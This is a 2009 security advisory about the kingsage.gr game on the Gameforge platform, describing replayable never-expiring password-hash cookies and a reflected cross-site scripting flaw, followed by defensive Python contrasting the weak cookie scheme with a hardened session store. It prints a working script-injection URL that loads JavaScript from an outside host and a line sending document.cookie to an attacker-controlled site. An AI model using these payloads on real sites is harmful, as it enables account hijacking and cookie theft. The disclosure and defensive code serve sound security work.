gameforge-xsscookie.txt
Posted on 30 September 2009
Dear all,

I'd like to inform you about a security vulnerability in the gameforge.de gaming platform. This vulnerability has been validated only for kingsage.gr (versions 0.1.17, 0.1.18 and 0.1.19 - latest) but might affect all games developed on the same platform (e.g. ikariam, gladiatus, katsuro, battleknight, bitefight, etc.).

=========================== Authentication bypass using hashed values ===========================

After the initial login into the game, all following plain HTTP GET/POST requests are similar to this:

GET http://s1.kingsage.gr/game.php?village=24482&s=build_main HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-silverlight, */*
Referer: http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron
Accept-Language: el
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET CLR 1.1.4322)
Host: s1.kingsage.gr
Cookie: game_hash=cce006dc722ff22ad8a8e5a13fd3c698; SD_FRAMEWORK_SESSION=0b1f74bebf7875e96338e9d4c6e37d4e; game_user=some.user; game_pass=347183427615221ca90w24db1039a8cc
Proxy-Connection: Keep-Alive

These requests include, among other things, three critical elements:

village=24482 [The village number - can be found for any user from within the game]
game_user=some.user [The user's username in plaintext]
game_pass=347183427615221ca90w24db1039a8cc [The md5 hash value of the user's password]

Taking into account that this traffic is plain HTTP and can be sniffed, and that the game's cookies do not expire, a malicious user - by obtaining another user's cookies *once* - can bypass authentication and access the application/game as that user *at any time*. The steps are the following.
1. The malicious user uses his/her personal account to enter the game.
2. The malicious user modifies any following request by deleting SD_FRAMEWORK_SESSION and game_hash from the cookie and sends only the village, game_user and game_pass values that he/she has obtained.

Using this approach a malicious user can access (at any time) the account of another user without knowing his/her (plaintext) password.

=========================== Vulnerability Impact (Correlated with Cross Site Scripting) ===========================

The existence of Cross Site Scripting in the gaming platform raises the impact of the vulnerability. As an example, if malicious user [A] sends to user [B], *from within the game's messaging functionality*, a message like this:

[url]http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E[/url]

user [A] is able to inject/include malicious javascript code [<SCRIPT SRC=http://../maliciouscode.js></SCRIPT>] in order to steal the cookie of user [B], which includes all the sensitive information needed for the attack described in the first part. (This can be accomplished using e.g. document.location='http://user_a_controlled_site?cookie='+document.cookie; in maliciouscode.js.)

Kind regards,
mestre.rigel
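From the defender's side, the following Python is an added illustration (example code, not part of the original advisory or of the game's own code): it models the cookie scheme described above, where game_user and game_pass (the md5 of the password) act as a never-expiring credential, next to an opaque server-side session id that expires and is sent with HttpOnly and Secure so that injected script cannot read it via document.cookie and it does not travel over plain HTTP. The account, password and clock are constructed values.

```python
import hashlib
import hmac
import secrets
import time

# Constructed account; the unsalted md5 store mirrors the advisory and is itself weak.
USERS = {"some.user": hashlib.md5(b"correct horse").hexdigest()}

def parse_cookie_header(header):
    # Split a Cookie header such as 'a=1; b=2' into a dict.
    pairs = (p.strip().split("=", 1) for p in header.split(";") if "=" in p)
    return dict(pairs)

def weak_cookie_auth(cookie):
    """The advisory's scheme: game_user + game_pass (md5 of the password) act as a
    never-expiring credential, so a cookie captured once replays indefinitely."""
    user, digest = cookie.get("game_user"), cookie.get("game_pass", "")
    if user in USERS and hmac.compare_digest(USERS[user], digest):
        return user
    return None

class SessionStore:
    """Hardened alternative: an opaque random session id kept server-side with an
    expiry, so the cookie carries no password material at all."""

    def __init__(self, ttl_seconds, now=time.time):
        self.ttl, self.now = ttl_seconds, now
        self._sessions = {}  # session id -> (username, expires_at)

    def issue(self, user):
        """Create a session; call only after the password has been verified."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (user, self.now() + self.ttl)
        return sid

    def set_cookie(self, sid):
        # HttpOnly hides the id from document.cookie; Secure keeps it off plain HTTP.
        return (f"SD_FRAMEWORK_SESSION={sid}; Max-Age={self.ttl}; Path=/; "
                "Secure; HttpOnly; SameSite=Lax")

    def authenticate(self, cookie):
        sid = cookie.get("SD_FRAMEWORK_SESSION", "")
        record = self._sessions.get(sid)
        if record is None:  # missing, unknown or already revoked session id
            return None
        user, expires_at = record
        if self.now() >= expires_at:
            self._sessions.pop(sid, None)  # expired: require a fresh login
            return None
        return user
```

With the hardened store, a request that carries only game_user and game_pass (step 2 above) is rejected, and a stolen session id stops working once its Max-Age has passed or the server revokes it.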

